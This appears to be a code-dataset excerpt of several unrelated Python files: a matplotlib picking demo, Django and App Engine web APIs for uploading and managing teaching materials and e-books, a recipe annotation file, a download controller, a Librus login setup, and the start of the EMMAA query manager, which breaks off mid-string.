matplotlib.pyplot import figure, show\nimport numpy as npy\nfrom numpy.random import rand\n\n\nif 1: # picking on a scatter plot (matplotlib.collections.RegularPolyCollection)\n\n x, y, c, s = rand(4, 100)\n def onpick3(event):\n ind = event.ind\n print('onpick3 scatter:', ind, npy.take(x, ind), npy.take(y, ind))\n\n fig = figure()\n ax1 = fig.add_subplot(111)\n col = ax1.scatter(x, y, 100*s, c, picker=True)\n #fig.savefig('pscoll.eps')\n fig.canvas.mpl_connect('pick_event', onpick3)\n\nshow()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#from PyQt4 import QtGui\n#import sys\n\n\n#class Foo(QtGui.QMainWindow):\n# def __init__(self):\n# QtGui.QMainWindow.__init__(self)\n\n# items = ['foo', 'bar', 'yib', 'nuz', 'pip', 'rof']\n# cb = QtGui.QComboBox(self)\n# for i in items:\n# cb.addItem(i)\n\n# disable = [1, 4]\n# for i in disable:\n# cb.model().item(i).setEnabled(False)\n\n#if __name__ == \"__main__\":\n# app = QtGui.QApplication([])\n# foobar = Foo()\n# foobar.show()\n# sys.exit(app.exec_())\n\n#import numpy as np\n#import matplotlib.pyplot as plt\n\n#N = 3\n#ind = np.arange(N) # the x locations for the groups\n#width = 0.1 # the width of the bars\n\n#fig = plt.figure()\n#ax = fig.add_subplot(111)\n\n#yvals = [4, 9, 2]\n#rects1 = ax.bar(ind, yvals, width, color='r')\n#zvals = [1,2,3]\n#rects2 = ax.bar(ind+width, zvals, width, color='g')\n#kvals = [11,12,13]\n#rects3 = ax.bar(ind+width*2, kvals, width, color='b')\n\n#ax.set_ylabel('Scores')\n#ax.set_xticks(ind+width)\n#ax.set_xticklabels( ('2011-Jan-4', '2011-Jan-5', '2011-Jan-6') )\n#ax.legend( (rects1[0], rects2[0], rects3[0]), ('y', 'z', 'k') )\n\n#def autolabel(rects):\n# for rect in rects:\n# h = rect.get_height()\n# ax.text(rect.get_x()+rect.get_width()/2., 1.05*h, '%d'%int(h),\n# ha='center', va='bottom')\n\n#autolabel(rects1)\n#autolabel(rects2)\n#autolabel(rects3)\n\n## clean up\n#plt.tight_layout()\n#plt.show()\n\n## grouped bar histogram\n#n_bins = 10\n#x = np.random.randn(1000, 3)\n\n#fig, ax = plt.subplots()\n\n#colors = ['red', 'tan', 'lime']\n#ax.hist(x, n_bins, normed=1, histtype='bar', color=colors, label=colors)\n#ax.legend(prop={'size': 10})\n#ax.set_title('bars with legend')","sub_path":"PyQt4 apps/flight-gui/tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"430855514","text":"# coding:utf-8\n__author__ = 'Windy'\n\nimport traceback\nimport datetime\n\n\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom django.db.models import Max\nfrom rest_framework.decorators import permission_classes\nfrom rest_framework.permissions import AllowAny\n\nfrom commons.basic_models import json_message\nfrom mis import models\nfrom mis.tasks import notices\nfrom materials.writer import dao\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n\n@api_view(['GET'])\n@permission_classes((AllowAny, ))\ndef update_progress(request):\n \"\"\"\n 标记教材进度, 9999表示完成\n material -- 教材id\n \"\"\"\n params = request.GET\n sm_id = params.get('id', 0)\n progress = params.get('page', 0)\n clazz = params.get('clazz', 0)\n if int(progress) > 9999:\n return Response(json_message(success=False, msg=\"Failed\"))\n try:\n progress = int(progress)\n sm = models.StudentMaterials.objects.get(pk=sm_id)\n except:\n return Response(json_message(success=False, msg=\"Object Not found\"))\n if sm:\n sm.progress = progress\n sm.save()\n if clazz:\n try:\n cl = models.Classes.objects.get(pk=clazz)\n cl.material = sm.material\n cl.save()\n except:\n pass\n\n logger.info('%s Update student_material_id: %s to %s' % (request.user.username, sm_id, progress))\n return Response(json_message(msg=\"Success\"))\n\n\n@api_view(['POST'])\ndef material_upload_success(request):\n \"\"\"\n 上传教材成功\n 1.保存到数据库,\n 2.传到多贝云\n 3.转换成jpg\n package -- 教材包id\n key -- 问件路径\n nm -- file Name\n ext -- 文件扩展\n size -- 文件大小\n \"\"\"\n package_id = request.POST.get('packageId')\n key = request.POST.get('key')\n nm = request.POST.get('nm', '').split('.')[0]\n ext = request.POST.get('ext', '')\n size = request.POST.get('size', 0)\n try:\n size = float(size)\n except:\n size = 0\n try:\n max_order = models.Materials.objects.filter(package_id=package_id).aggregate(Max('order'))['order__max']\n max_order = max_order and max_order or 0\n m = models.Materials(package_id=package_id, name=nm, file=key, order=max_order + 1, size=size, ext=ext)\n # 转换并上传到多贝\n # convert(m, m.file.url)\n m.save()\n dao.foreign_convert.delay(m)\n except:\n logger.error(traceback.format_exc())\n return Response(json_message(success=False, msg=\"500 Server Error\"))\n data = dict(material=dict(id=m.id, pk=str(m.object_pk), url=m.file.url, name=m.name, pages=m.pages))\n return Response(json_message(data=data))\n\n\n@api_view(['POST'])\ndef attachment_upload_success(request):\n \"\"\"\n 上传教材附件成功\n 1.保存到数据库,\n 2.转换成jpg\n mid -- 教材包id\n key -- 问件路径\n nm -- file Name\n ext -- 文件扩展\n size -- 文件大小\n \"\"\"\n mid = request.POST.get('mid')\n key = request.POST.get('key')\n nm = request.POST.get('nm', '').split('.')[0]\n ext = request.POST.get('ext', '')\n size = request.POST.get('size', 0)\n try:\n size = float(size)\n except:\n size = 0\n try:\n at = models.Attachment(name=nm, file=key, size=size, ext=ext)\n at.save()\n m = models.Materials.objects.get(pk=mid)\n m.attachment.add(at)\n m.save()\n # TODO get pages, split to jpg, upload to duobeiyun\n\n except:\n logger.error(traceback.format_exc())\n return Response(json_message(success=False, msg=\"500 Server Error\"))\n return Response(json_message())\n\n\n@api_view(['POST'])\ndef material_replace_success(request):\n \"\"\"\n 替换教材\n 1.更新数据库,\n 2.传到多贝云\n 3.转换成jpg\n 4.通知相关人员教材更新\n\n mid -- 教材id\n key -- 文件路径\n nm -- file Name\n ext -- 文件扩展\n size -- 文件大小\n \"\"\"\n mid = request.POST.get('mid')\n key = request.POST.get('key')\n nm = request.POST.get('nm', '')\n ext = request.POST.get('ext', '')\n size = request.POST.get('size')\n\n try:\n size = float(size)\n except:\n size = 0\n try:\n m = models.Materials.objects.get(pk=mid)\n m.size = size\n m.file = key\n m.wxt_uuid = ''\n m.ext = ext\n m.name = nm\n m.pages = 0\n m.last_update = datetime.datetime.now()\n m.save()\n logger.info('Replace Material: Uid:%s-%s,Mid:%s', request.user.id, request.user.username, m.id)\n dao.foreign_convert.delay(m)\n except:\n logger.error(traceback.format_exc())\n return Response(json_message(success=False, msg=\"500 Server Error\"))\n data = dict(material=dict(id=m.id, pk=str(m.object_pk), url=m.file.url, name=m.name, pages=m.pages))\n return Response(json_message(data=data))\n\n\n@api_view(['POST'])\ndef del_material(request):\n \"\"\"\n 删除教材\n 1.检查学生是否在使用\n mid -- 教材id\n \"\"\"\n mid = request.POST.get('mid')\n try:\n m = models.Materials.objects.get(pk=mid)\n sm = models.StudentMaterials.objects.filter(material=m).filter(progress__gt=0)\n cnts = sm.count()\n if cnts:\n data = ''\n if cnts < 20:\n data = list(sm.values_list('student__number', flat=True))\n data = \"StudentId:\" + \",\".join(data)\n return Response(json_message(success=False,\n data=data,\n msg=\"Used by %s students, can not delete it\" % sm.count()))\n else:\n m.is_deleted = True\n m.last_update = datetime.datetime.now()\n m.save()\n logger.info('Del Material: Uid:%s-%s,Mid:%s', request.user.id, request.user.username, m.id)\n except:\n logger.error(traceback.format_exc())\n return Response(json_message(success=False, msg=\"500 Server Error\"))\n return Response(json_message())\n\n\n@api_view(['POST'])\ndef del_attachment(request):\n \"\"\"\n 删除教材附件\n attachment -- attachment Id\n \"\"\"\n attachment = request.POST.get('attachment')\n try:\n at = models.Attachment.objects.get(pk=attachment)\n at.is_deleted = True\n at.last_update = datetime.datetime.now()\n at.save()\n logger.info('Del Attachment: Uid:%s-%s,Mid:%s', request.user.id, request.user.username, attachment)\n except:\n logger.error(traceback.format_exc())\n return Response(json_message(success=False, msg=\"500 Server Error\"))\n return Response(json_message())\n\n\n@api_view(['GET'])\ndef convert_materials(request):\n \"\"\"\n 手动转换教材附件并上传至多贝云\n materials_id -- 教材id\n \"\"\"\n materials_id = request.GET.get('materials_id')\n try:\n m = models.Materials.objects.get(id=materials_id)\n # convert(material, material.file.url)\n dao.foreign_convert.delay(m)\n except:\n logger.error(traceback.format_exc())\n return Response(json_message(success=False, msg=\"500 Server Error\"))\n return Response(json_message())\n\n\n@api_view(['GET'])\ndef convert_unsuccessful_materials(request):\n \"\"\"\n 获得所有未进行图片转换的\n \"\"\"\n materials = models.Materials.objects.filter(md5=0)\n try:\n for m in materials:\n dao.foreign_convert.delay(m)\n except:\n logger.error(traceback.format_exc())\n return Response(json_message(success=False, msg=\"500 Server Error\"))\n return Response(json_message())\n","sub_path":"mis/materials/writer/apis.py","file_name":"apis.py","file_ext":"py","file_size_in_byte":7754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"299817344","text":"# -*- coding: utf-8 -*-\n__author__ = 'nagaitomoyuki'\n\n\nimport logging\nimport webapp2\nimport hashlib\nimport random\nimport cgi\nimport codecs\n\nimport json\nfrom util import ndb_json\nfrom util.common import Common\nfrom util.common import CircleLoginSessionRequestHandler\nfrom google.appengine.ext.webapp import blobstore_handlers\nfrom google.appengine.ext import blobstore\nfrom google.appengine.api import files\nfrom model.circlebookinfomation import CircleBookInfomation\nfrom model.circleinfomation import CircleInfomation\nfrom model.circleinfomationdetail import CircleInfomationDetail\n\n\n\n\nlogging.getLogger().setLevel(logging.INFO)\n\nclass Index(CircleLoginSessionRequestHandler):\n\n def post(self):\n\n if self.invalidateSession():\n return self.returnSessionErrorResponse()\n\n\n res = {'session':True}\n\n self.response.content_type = 'application/json'\n self.response.write(ndb_json.toJSON(res))\n\n\n\nclass CreateUploadUrl(CircleLoginSessionRequestHandler):\n\n def post(self):\n\n if self.invalidateSession():\n return self.returnSessionErrorResponse()\n\n upload_url = blobstore.create_upload_url('/circle/api/mypage/ebooksinfomationsubmit')\n\n res = {\n 'session':True,\n 'uploadurl':upload_url\n }\n logging.info(upload_url)\n\n self.response.content_type = 'application/json'\n self.response.write(ndb_json.toJSON(res))\n\n\n\n\nclass EbooksInfomationSubmit(blobstore_handlers.BlobstoreUploadHandler,CircleLoginSessionRequestHandler):\n\n def post(self):\n\n if self.invalidateSession():\n return self.returnSessionErrorResponse()\n logging.info(self.request)\n\n param = self.request.arguments()\n logging.info(param)\n logging.info(self.request.get('title'))\n\n title = Common.postRequestToUnicode(self.request.get('title'))\n description = Common.postRequestToUnicode(self.request.get('description'))\n priceNo = int(self.request.get('price'))\n\n contentDataInfo = self.get_uploads('contentdata')[0]\n contentDataName = Common.postRequestToUnicode(contentDataInfo.filename)\n circleid = int(self.session['circleid'])\n\n\n\n# logging.info(contentDataInfo)\n# logging.info(str(contentDataInfo.key()))\n# logging.info(hashlib.md5(str(contentDataInfo.key())).hexdigest())\n\n #書籍データを GCSへコピーする\n# contentDataGCSPath = '/gs/dotculture/ebooks/bookImage_%d_%s' % (userid,hashlib.md5(str(contentDataInfo.key())).hexdigest())\n# Common.blobStoreToCloudStorage(contentDataInfo,contentDataGCSPath,'application/zip')\n\n info = CircleBookInfomation()\n info.circleInfomationId = circleid\n info.contentDataKey = contentDataInfo.key()\n info.contentDataName = contentDataName\n info.contentDataSize = contentDataInfo.size\n info.title = title\n info.description = description\n info.priceNo = priceNo\n info.state = CircleBookInfomation.STATE_UPLOAD\n info.sercret = hashlib.sha256(str(random.random())).hexdigest()\n\n info.put()\n\n\n self.redirect('/circle/mypage/index.html')\n\n\nclass BookInfomationEdit(CircleLoginSessionRequestHandler):\n\n def get(self):\n logging.info(self.request)\n\n if self.invalidateSession():\n return self.returnSessionErrorResponse()\n\n circleid = int(self.session['circleid'])\n circleBookInfomationId = int(self.request.get('id'))\n\n info = CircleBookInfomation.get_by_id(circleBookInfomationId)\n\n res = {\n 'response':{'status':200},\n 'circleBookInfomation':info,\n }\n\n self.response.content_type = 'application/json'\n self.response.write(ndb_json.toJSON(res))\n\n\n\nclass BookInfomationEditSubmit(CircleLoginSessionRequestHandler):\n\n def post(self):\n\n if self.invalidateSession():\n return self.returnSessionErrorResponse()\n logging.info(self.request)\n\n param = json.JSONDecoder().decode(self.request.body)\n\n logging.info(param)\n logging.info(param['title'])\n\n introduction= param['introduction']\n description = param['description']\n priceNo = int(param['price']['value'])\n\n circleid = int(self.session['circleid'])\n circleBookInfomationId = int(param['datastoreId'])\n\n\n info = CircleBookInfomation.get_by_id(circleBookInfomationId)\n\n if info.circleInfomationId != circleid:\n return self.returnSessionErrorResponse()\n\n\n info.description = description\n info.introduction = introduction\n info.priceNo = priceNo\n\n info.put()\n\n res = {'response':{'status':200},'check':True}\n\n self.response.content_type = 'application/json'\n self.response.write(ndb_json.toJSON(res))\n\n\n\nclass BookStatus(CircleLoginSessionRequestHandler):\n\n def get(self):\n\n if self.invalidateSession():\n return self.returnSessionErrorResponse()\n\n circleid = int(self.session['circleid'])\n\n ret = CircleBookInfomation.query(CircleBookInfomation.circleInfomationId==circleid).order(-CircleBookInfomation.insertDate).fetch_page(10)\n\n res = {\n 'response':{'status':200},\n 'circleBookInfomationList':ret[0],\n 'cursor':None,\n 'more':ret[2],\n }\n\n if ret[1]!=None:\n res['cursor'] = ret[1].urlsafe()\n\n self.response.content_type = 'application/json'\n self.response.write(ndb_json.toJSON(res))\n\n\nclass FeedBack(CircleLoginSessionRequestHandler):\n\n def get(self):\n\n if self.invalidateSession():\n return self.returnSessionErrorResponse()\n\n circleid = int(self.session['circleid'])\n circleBookInfomationId = int(self.request.get('id'))\n\n bookinfo = CircleBookInfomation.get_by_id(circleBookInfomationId)\n\n if bookinfo.circleInfomationId != circleid:\n return self.returnSessionErrorResponse()\n\n sql_usertotal = \"select count(tmp.userid) from (select userid from watchlog where appid=%d group by userid) as tmp;\" % (int(circleBookInfomationId))\n sql_pageview = \"select count(userid) from watchlog where appid=%d;\" % (int(circleBookInfomationId))\n sql_watchtime = \"select sum(time) from watchlog where appid=%d;\" % (int(circleBookInfomationId))\n sql_top5 = \"select no,page,sum(time) as totaltime from watchlog where appid=%d group by no,page order by totaltime desc limit 5;\" % (int(circleBookInfomationId))\n\n conn = Common.getSqlConnection()\n cursor = conn.cursor()\n cursor.execute(sql_usertotal)\n usertotalrows = cursor.fetchall()\n cursor.execute(sql_pageview)\n pageviewrows = cursor.fetchall()\n cursor.execute(sql_watchtime)\n watchtimerows = cursor.fetchall()\n cursor.execute(sql_top5)\n top5rows = cursor.fetchall()\n conn.close()\n\n logging.info(usertotalrows[0])\n logging.info(pageviewrows[0])\n logging.info(watchtimerows[0][0])\n logging.info(top5rows)\n\n top5 = []\n for row in top5rows:\n element = {\n 'no':int(row[0]),\n 'page':int(row[1]),\n 'time':int(row[2])\n }\n top5.append(element)\n logging.info(top5)\n\n res = {\n 'response':{'status':200},\n 'usertotal':usertotalrows[0][0],\n 'pageview':pageviewrows[0][0],\n 'watchtime':int(watchtimerows[0][0]),\n 'top5':top5,\n }\n\n logging.info(ndb_json.toJSON(res))\n self.response.content_type = 'application/json'\n self.response.write(ndb_json.toJSON(res))\n\n\n\n\nclass GetCircleInfomationAndDetail(CircleLoginSessionRequestHandler):\n\n def get(self):\n\n if self.invalidateSession():\n return self.returnSessionErrorResponse()\n\n circleid = int(self.session['circleid'])\n\n infomation = CircleInfomation.get_by_id(circleid)\n detail = CircleInfomationDetail.query(CircleInfomationDetail.circleInfomationId==circleid).get()\n\n res = {\n 'response':{'status':200},\n 'infomation':infomation,\n 'detail':detail,\n }\n\n self.response.content_type = 'application/json'\n self.response.write(ndb_json.toJSON(res))\n\n\n\nclass SubmitCircleInfomationAndDetail(CircleLoginSessionRequestHandler):\n\n def get(self):\n\n if self.invalidateSession():\n return self.returnSessionErrorResponse()\n\n param = json.JSONDecoder().decode(self.request.body)\n\n circleid = int(self.session['circleid'])\n\n info = CircleInfomation.get_by_id(circleid)\n detail = CircleInfomationDetail.query(CircleInfomationDetail.circleInfomationId==circleid).get()\n\n\n info.circlename = param['circlename']\n info.circlenamekana = param['circlenamekana']\n info.password = Common.toPasswordHash(param['password'])\n #メールアドレスは勝手に変更できない。いたずら防止\n #info.mailaddress = param['mailaddress']\n\n\n detail.leadername = param['leadername']\n detail.leadernamekana = param['leadernamekana']\n detail.sex = param['sex']\n detail.zipcode1 = param['zipcode1']\n detail.zipcode2 = param['zipcode2']\n detail.state = int(param['state']['value'])\n detail.city = param['city']\n detail.address = param['address']\n detail.building = param['building']\n detail.phone = param['phone']\n detail.website = param['website']\n\n detail.bankname = param['bankname']\n detail.bankno = param['bankno']\n detail.bankofficename = param['bankofficename']\n detail.officetype = int(param['officetype']['value'])\n detail.bankofficeno = param['bankofficeno']\n\n detail.bankaccounttype = int(param['bankaccounttype']['value'])\n detail.bankaccountno = param['bankaccountno']\n detail.bankaccountname = param['bankaccountname']\n\n info.put();\n detail.put();\n\n\n res = {'response':{'status':200},'check':True}\n\n\n self.response.content_type = 'application/json'\n self.response.write(ndb_json.toJSON(res))\n\n\n\napp = webapp2.WSGIApplication(\n [\n ('/circle/api/mypage/index', Index),\n ('/circle/api/mypage/createuploadurl', CreateUploadUrl),\n ('/circle/api/mypage/ebooksinfomationsubmit', EbooksInfomationSubmit),\n ('/circle/api/mypage/bookstatus', BookStatus),\n ('/circle/api/mypage/feedback', FeedBack),\n ('/circle/api/mypage/bookinfomationedit', BookInfomationEdit),\n ('/circle/api/mypage/bookinfomationeditsubmit', BookInfomationEditSubmit),\n ('/circle/api/mypage/getcircleinfomationanddetail', GetCircleInfomationAndDetail),\n ('/circle/api/mypage/submitcircleinfomationanddetail', SubmitCircleInfomationAndDetail),\n ],\n debug=True,\n config=CircleLoginSessionRequestHandler.config()\n)\n\n\n","sub_path":"server/circle/api/mypage.py","file_name":"mypage.py","file_ext":"py","file_size_in_byte":11478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"56586380","text":"from kitchen import kitchenState, annotatedRecipe\nfrom esdcs.groundings import PhysicalObject\n\nrecipeName=\"CAKE MIX COOKIES\"\nrecipeSource=\"http://www.cooks.com/rec/view/0,1610,130188-253193,00.html\"\ningredientsList= [(\"1 package of cake mix (any flavor)\",\n kitchenState.Ingredient(contains=[\"cake_mix\"], homogenous=True, amount=\"1 package\",\n physicalObject=PhysicalObject(kitchenState.prism_from_point(5, 1, 1, 2), lcmId=2, tags=['cake', 'mix']))),\n (\"1 large egg\", kitchenState.Ingredient(contains=[\"eggs\"], homogenous=True, amount=\"1\",\n physicalObject=PhysicalObject(kitchenState.prism_from_point(3, 1, 1, 2), lcmId=1, tags=['eggs']))),\n (\"1/4 cup of oil\", kitchenState.Ingredient(contains=[\"oil\"], homogenous=True, amount=\"1/4 cup\",\n physicalObject=PhysicalObject(kitchenState.prism_from_point(3, 1, 1, 2), lcmId=1, tags=['oil']))),\n (\"1/4 cup of water\", kitchenState.Ingredient(contains=[\"water\"], homogenous=True, amount=\"1/4 cup\",\n physicalObject=PhysicalObject(kitchenState.prism_from_point(3, 1, 1, 2), lcmId=1, tags=['water']))),\n (\"1 cup of chopped nuts, raisins, oatmeal, coconut, chocolate chips, etc. (anything you like in cookies)\", kitchenState.Ingredient(contains=[\"toppings\"], homogenous=True, amount=\"1 cup\",\n physicalObject=PhysicalObject(kitchenState.prism_from_point(3, 1, 1, 2), lcmId=1, tags=['toppings']))),\n ]\n\n\ninstructionsList = [(\"Preheat oven to 350F.\", \"preheat(350)\"),\n (\"Combine cake mix, egg, oil, and water.\", \"pour(cake_mix), pour(eggs), pour(oil), pour(water)\"),\n (\"Beat until well blended. \", \"mix()\"),\n (\"Stir in remaining ingredient (s).\", \"pour(toppings), mix()\"),\n (\"Drop by teaspoon about 1 inch apart onto greased cooke sheet.\", \"scrape()\"),\n (\"Bake for 15 minutes or until done.\", \"bake(15)\"),\n (\"Makes about 4 dozen. \", \"noop()\"), (\"Yummy!\", \"noop()\")]\n\nannotatedRecipeObject = annotatedRecipe.AnnotatedRecipe(recipeName, recipeSource, ingredientsList, instructionsList)\n\n\n\n","sub_path":"data/kitchen/data/cakeMixCookies.py","file_name":"cakeMixCookies.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"570176234","text":"#!/usr/bin/env python\n# vim: ai ts=4 sts=4 et sw=4\n\n##\n##\n## @author UWANTWALI ZIGAMA Didier\n## d.zigama@pivotaccess.com/zigdidier@gmail.com\n##\n\n__author__=\"Zigama Didier\"\n__date__ =\"$Nov 22, 2017 1:29:30 PM$\"\n\nfrom controller.main import RSMSRWController\nfrom model.download import Download\nimport datetime\n\nclass DownloadController(RSMSRWController):\n \n def __init__(self, navb):\n self.navb = navb\n\n def download_file(self):\n\n cnds = self.navb.conditions()\n tmn = datetime.datetime.now()\n tm = '%s_%s_%s_%s_%s_%s' % (tmn.year, tmn.month, tmn.day, tmn.hour, tmn.minute, tmn.second)\n\n export = self.navb.kw.get('export')\n name = command = description = 'export'\n msg = \"\"\n download = Download.get_by_id(self.navb.kw.get('download'))\n if export:\n if export == 'performance':\n name = 'chws_performance'\n description = 'Chws performance'\n command = 'performance'\n elif export == 'chws':\n name = 'chws_list'\n description = 'Chws list'\n command = 'chws_list'\n else:\n return msg, download\n\n filename = '%(name)s_%(tm)s_from_%(start)s_to_%(end)s.xlsx' % { 'name': name,\n 'start': self.navb.start.date(),\n 'end': self.navb.finish.date(),\n 'tm': tm\n }\n\n dwn = Download.process_download(self.navb.user, command, description = description, filename = filename,\n filters = cnds, start = self.navb.start.date(), end = self.navb.finish.date())\n if dwn:\n msg, download = (\"Export file is being processed, once done you will be able to see download link available. \", dwn)\n\n else:\n msg, download = (\"Export file failed to process. Please try again.\", None)\n\n return msg, download\n\n def get_tables(self):\n cnds = self.navb.conditions()\n cnds.update({\"(created_at) <= '%s'\" % (self.navb.finish) : ''})\n cnds.update({\"(created_at) >= '%s'\" % (self.navb.start) : ''})#;print cnds \n exts = {}\n cnds, markup, cols = self.navb.neater_tables(cnds = cnds, extras = [\n ('description', 'Description'),\n ('status', 'Status'),\n ('created_at', 'Creation Date'),\n ('filename', 'Filename'),\n ('indexcol', 'ID')\n \n ])\n\n markup.update({'indexcol': lambda x, _, __: 'Download File' % (x), })\n title, sc, group, attrs, nat, tabular, locateds, INDICS_HEADERS = ('', '', '', [], [], [],[],[])\n dcols = [x[0] for x in cols]\n cnds.update({'user_pk = %s': self.navb.user.indexcol})\n nat = Download.fetch_log_downloads(cnds, dcols)\n desc = 'Exported files list'\n \n return (title, desc, group, attrs, markup, cols, nat, tabular, locateds, INDICS_HEADERS)\n","sub_path":"src/com/rwanda/mch/controller/downloads.py","file_name":"downloads.py","file_ext":"py","file_size_in_byte":3550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"113699601","text":"from . import Config\nfrom ..helpers import pwd_prompt\nfrom librusapi import Token\nfrom librusapi.exceptions import LoginError\n\n\nclass Setup:\n \"\"\"\n All you need for inital run of the program\n \"\"\"\n\n def __init__(self):\n self.config = Config()\n\n def begin(self):\n try:\n self.config.username = input(\"Username: \")\n except KeyboardInterrupt:\n exit(1)\n logged = False\n while not logged:\n try:\n pwd = pwd_prompt()\n except KeyboardInterrupt:\n exit(1)\n\n try:\n self.config.token = Token.get(self.config.username, pwd)\n except LoginError as ex:\n print(\"Login failed!\")\n print(f\"Username is '{self.config.username}'\")\n except Exception as ex:\n print(ex)\n exit(1)\n else:\n logged = True\n try:\n self.config.write()\n except Exception as ex:\n print(ex)\n exit(1)\n","sub_path":"pypi_install_script/libruscli-0.0.3-py3-none-any/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"467638140","text":"import logging\nimport pickle\nfrom datetime import datetime\nfrom emmaa.util import get_s3_client, make_date_str\nfrom emmaa.db import get_db\n\n\nlogger = logging.getLogger(__name__)\n\n\nmodel_manager_cache = {}\n\n\nclass QueryManager(object):\n \"\"\"Manager to run queries and interact with the database.\n\n Parameters\n ----------\n db : emmaa.db.EmmaaDatabaseManager\n An instance of a database manager to use.\n model_managers : list[emmaa.model_tests.ModelManager]\n Optional list of ModelManagers to use for running queries. If not\n given, the methods will load ModelManager from S3 when needed.\n \"\"\"\n def __init__(self, db=None, model_managers=None):\n self.db = db\n if db is None:\n self.db = get_db('primary')\n self.model_managers = model_managers if model_managers else []\n\n def answer_immediate_query(\n self, user_email, user_id, query, model_names, subscribe):\n \"\"\"This method first tries to find saved result to the query in the\n database and if not found, runs ModelManager method to answer query.\"\"\"\n # Store query in the database for future reference.\n self.db.put_queries(user_email, user_id, query, model_names, subscribe)\n # Check if the query has already been answered for any of given models\n # and retrieve the results from database.\n saved_results = self.db.get_results_from_query(query, model_names)\n if not saved_results:\n saved_results = []\n checked_models = {res[0] for res in saved_results}\n # If the query was answered for all models before, return the results.\n if checked_models == set(model_names):\n return format_results(saved_results)\n # Run queries mechanism for models for which result was not found.\n new_results = []\n new_date = datetime.now()\n for model_name in model_names:\n if model_name not in checked_models:\n mm = self.get_model_manager(model_name)\n response_list = mm.answer_query(query)\n for (mc_type, response) in response_list:\n new_results.append(\n (model_name, query, mc_type, response, new_date))\n if subscribe:\n self.db.put_results(\n model_name,\n [(query, mc_type, response)\n for mc_type, response in response_list])\n all_results = saved_results + new_results\n return format_results(all_results)\n\n def answer_registered_queries(\n self, model_name, find_delta=True, notify=False):\n \"\"\"Retrieve queries registered on database for a given model,\n answer them, calculate delta between results, notify users in case of\n any changes, and put results to a database.\n \"\"\"\n model_manager = self.get_model_manager(model_name)\n queries = self.db.get_queries(model_name)\n # Only do the following steps if there are queries for this model\n if queries:\n results = model_manager.answer_queries(queries)\n new_results = [(model_name, result[0], result[1], result[2], '')\n for result in results]\n # Optionally find delta between results\n # NOTE: For now the report is presented in the logs. In future we\n # can choose some other ways to keep track of result changes.\n if find_delta:\n reports = self.make_reports_from_results(new_results, False, 'str')\n for report in reports:\n logger.info(report)\n self.db.put_results(model_name, results)\n\n def get_registered_queries(self, user_email):\n \"\"\"Get formatted results to queries registered by user.\"\"\"\n results = self.db.get_results(user_email)\n return format_results(results)\n\n def make_reports_from_results(\n self, new_results, stored=True, report_format='str'):\n \"\"\"Make a report given latest results and queries the results are for.\n\n Parameters\n ----------\n new_results : list[tuple]\n Latest results as a list of tuples where each tuple has the format\n (model_name, query, mc_type, result_json, date).\n stored : bool\n Whether the new_results are already stored in the database.\n report_format : str\n A format to write reports in. Accepted values: 'str' and 'html'.\n Returns\n -------\n reports : list[str]\n A list of reports on changes for each of the queries.\n \"\"\"\n processed_query_mc = []\n reports = []\n # If latest results are in db, retrieve the second latest\n if stored:\n order = 2\n # If latest results are not in db, retrieve the latest stored\n else:\n order = 1\n for model_name, query, mc_type, new_result_json, _ in new_results:\n if (model_name, query, mc_type) in processed_query_mc:\n continue\n try:\n old_results = self.db.get_results_from_query(\n query, [model_name], order)\n if old_results:\n for old_result in old_results:\n if mc_type == old_result[2]:\n old_result_json = old_result[3]\n if report_format == 'str':\n report = self.make_str_report_one_query(\n model_name, query, mc_type,\n new_result_json, old_result_json)\n elif report_format == 'html':\n report = self._make_html_one_query_inner(\n model_name, query, mc_type,\n new_result_json, old_result_json)\n reports.append(report)\n else:\n logger.info('No previous result was found.')\n if report_format == 'str':\n report = self.make_str_report_one_query(\n model_name, query, mc_type, new_result_json, None)\n elif report_format == 'html':\n report = self._make_html_one_query_inner(\n model_name, query, mc_type, new_result_json, None)\n reports.append(report)\n except IndexError:\n logger.info('No result for desired date back was found.')\n if report_format == 'str':\n report = self.make_str_report_one_query(\n model_name, query, mc_type, new_result_json, None)\n elif report_format == 'html':\n report = self._make_html_one_query_inner(\n model_name, query, mc_type, new_result_json, None)\n reports.append(report)\n processed_query_mc.append((model_name, query, mc_type))\n return reports\n\n def get_user_query_delta(\n self, user_email, filename='query_delta', report_format='str'):\n \"\"\"Produce a report for all query results per user in a given format.\"\"\"\n results = self.db.get_results(user_email, latest_order=1)\n if report_format == 'str':\n filename = filename + '.txt'\n self.make_str_report_per_user(results, filename=filename)\n elif report_format == 'html':\n filename = filename + '.html'\n self.make_html_report_per_user(results, filename=filename)\n\n def get_report_per_query(self, model_name, query):\n try:\n new_results = self.db.get_results_from_query(\n query, [model_name], latest_order=1)\n except IndexError:\n logger.info('No latest result was found.')\n return None\n return self.make_reports_from_results(new_results, True, 'str')\n\n def make_str_report_per_user(self, results, filename='query_delta.txt'):\n \"\"\"Produce a report for all query results per user in a text file.\"\"\"\n reports = self.make_reports_from_results(results, True, 'str')\n with open(filename, 'w') as f:\n for report in reports:\n f.write(report)\n\n def make_html_report_per_user(self, results, filename='query_delta.html'):\n \"\"\"Produce a report for all query results per user in an html file.\"\"\"\n msg = ''\n reports = self.make_reports_from_results(results, True, 'html')\n for report in reports:\n msg += report\n msg += ''\n with open(filename, 'w') as f:\n f.write(msg)\n\n def make_str_report_one_query(self, model_name, query, mc_type,\n new_result_json, old_result_json=None):\n \"\"\"Return a string message containing information about a query and any\n change in the results.\"\"\"\n if is_query_result_diff(new_result_json, old_result_json):\n if not old_result_json:\n msg = f'\\nThis is the first result to query {query} ' \\\n f'in {model_name} with {mc_type} model checker.' \\\n f'\\nThe result is:'\n msg += _process_result_to_str(new_result_json)\n else:\n msg = f'\\nA new result to query {query} in {model_name} was ' \\\n f'found with 